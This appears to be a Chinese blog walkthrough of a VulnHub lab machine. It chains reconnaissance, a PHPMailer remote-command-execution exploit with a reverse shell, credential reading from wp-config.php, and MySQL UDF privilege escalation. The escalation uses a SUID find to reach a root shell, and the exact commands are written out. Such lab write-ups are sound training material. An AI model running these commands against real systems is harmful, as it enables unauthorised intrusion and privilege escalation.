渗透测试之靶机试炼(二)

靶机简介

靶机下载地址:
https://www.vulnhub.com/#modal269download

运行环境:
VirtualBox

攻击测试机环境
kali
win 10

工具简介
searchsploit
nc
nmap
python
udf
dirb

靶机网卡设置:

三台虚拟主机在同一局域网即可
作者这里直接将靶机桥接到win 10 和kali虚拟机所在网段。
渗透测试之靶机试炼(二)_第1张图片

信息收集

这个靶机并没有直接给出目标ip,那么就需要我们自己去找目标主机的ip,这里我使用nmap的全网段扫描功能去实现。
命令:nmap -v 10.211.55.0/24
渗透测试之靶机试炼(二)_第2张图片发现目标主机ip为10.211.55.16,发现存在80端口,访问查看。
我点击了一些链接,并没有发现可利用的点,之后常规思路,进行目录爆破。
命令: dirb http://10.211.55.16
渗透测试之靶机试炼(二)_第3张图片发现时用wordpress搭建的,找到两个目录,进去查看。首先自然查看wordpress下,看看有没有什么上传、弱口令之类的,然而毛线都没有,后台都没打开。
渗透测试之靶机试炼(二)_第4张图片接下来我查看另一个目录。发现一些可疑信息,该网站使用了phpmailer插件,查看版本是5.2.16。
渗透测试之靶机试炼(二)_第5张图片渗透测试之靶机试炼(二)_第6张图片继续查看其余文件,在一个PATH文件内发现网站绝对路径
渗透测试之靶机试炼(二)_第7张图片
由于phpmailer低版本存在漏洞,我们直接用kali自带的工具查询是否有可利用漏洞。
命令:searchsploit phpmailer
渗透测试之靶机试炼(二)_第8张图片查到一个远程命令执行的exp,我们把它copy到当前目录下。查看修改exp。
cp命令:cp /usr/share/exploitdb/exploits/php/webapps/40974.py /root/
渗透测试之靶机试炼(二)_第9张图片修改目标地址、后门名臣、反弹shell地址及网站绝对路径。然后执行exp。
渗透测试之靶机试炼(二)_第10张图片然后使用nc本地监听4444端口,使用浏览器访问上传的shell。
shell地址:http://10.211.55.16/123/php
nc命令:nc -lvp 4444
渗透测试之靶机试炼(二)_第11张图片反弹会一个shell,权限为www-data。使用python获取一个交互式shell。
命令:python -c ‘import pty; pty.spawn("/bin/bash")’
渗透测试之靶机试炼(二)_第12张图片

udf提权

拿到webshell后进行信息收集,查看主机相关文件及其配置。查看本机是否存在内核提权漏洞,并没有找到。查看本地端口及服务,发现使用了3306端口。
渗透测试之靶机试炼(二)_第13张图片那么只要找到用户名密码就可以连接数据库,网站是用来wordpress框架,所以直接查看wordpress配置文件,在wp-config.php中发现数据库用户名及密码。
渗透测试之靶机试炼(二)_第14张图片既然找到了数据用户名密码,那么就用数据库udf提权。搜索udf提权exp。
在这里插入图片描述查看exp用法。https://www.exploit-db.com/exploits/1518
渗透测试之靶机试炼(二)_第15张图片首先在攻击机kali上copy编译exp。
命令: cp /usr/share/exploitdb/exploits/linux/local/1518.c /root/
gcc -g -c 1518.c
gcc -g -shared -Wl,-soname.1518.so -o 1518.so 1518.o -lc
渗透测试之靶机试炼(二)_第16张图片使用python在kali上开启一个web服务,然后在获得的shell上执行下载命令,将exp下载到靶机本地。
在这里插入图片描述渗透测试之靶机试炼(二)_第17张图片连接mysql。
渗透测试之靶机试炼(二)_第18张图片mysql udf 提权命令

use wordprsss;
渗透测试之靶机试炼(二)_第19张图片create table foo(line blob);
渗透测试之靶机试炼(二)_第20张图片
insert into foo values(load_file(’/var/www/html/1518.so’));
渗透测试之靶机试炼(二)_第21张图片select * from foo into dumpfile ‘/usr/lib/mysql/plugin/1518.so’;
渗透测试之靶机试炼(二)_第22张图片create function do_system returns integer soname ‘1518.so’;
在这里插入图片描述select do_system(‘chmod u+s /usr/bin/find’);
渗透测试之靶机试炼(二)_第23张图片quite
touch 123
find 123 -exec ‘whoami’ ;
渗透测试之靶机试炼(二)_第24张图片find 123 -exec ‘/bin/sh’ ;
渗透测试之靶机试炼(二)_第25张图片

你可能感兴趣的:(靶机试炼)